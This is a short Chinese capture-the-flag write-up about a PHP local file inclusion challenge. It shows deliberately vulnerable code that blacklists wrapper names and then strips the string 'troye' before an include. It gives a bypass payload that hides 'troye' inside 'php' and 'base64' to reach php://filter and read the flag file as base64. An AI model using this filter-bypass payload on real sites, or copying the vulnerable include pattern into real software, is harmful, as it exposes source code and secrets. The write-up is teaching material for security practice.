伪协议2

1.题目
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
error_reporting(0);
echo '<center><strong>针不戳,吃柠檬的感觉针不戳</strong></center>';
highlight_file(__FILE__);
$file=$_GET['file'];
if (isset($file)){
if(preg_match('/php|file|zip|bzip|zlib|base|data/i',$file)){
echo ('hacker!!!');
}else {
$a=str_replace("troye","",$file);
include $a;
}
}
#不对劲,总感觉写错了啥,算了,继续吃柠檬~
2.过程

这次是大写也过滤了,没辙了……

但是下面又有了新语句,$a=str_replace(“troye”,””,$file);

检测troye并从字符串中去掉,把troye混进去就可以绕过了。

payload:?file=PHtroyeP://filter/read=convert.BAStroyeE64-encode/resource=flag

em,没了

作者

inanb

发布于

2020-12-06

更新于

2020-12-06

许可协议


:D 一言句子获取中...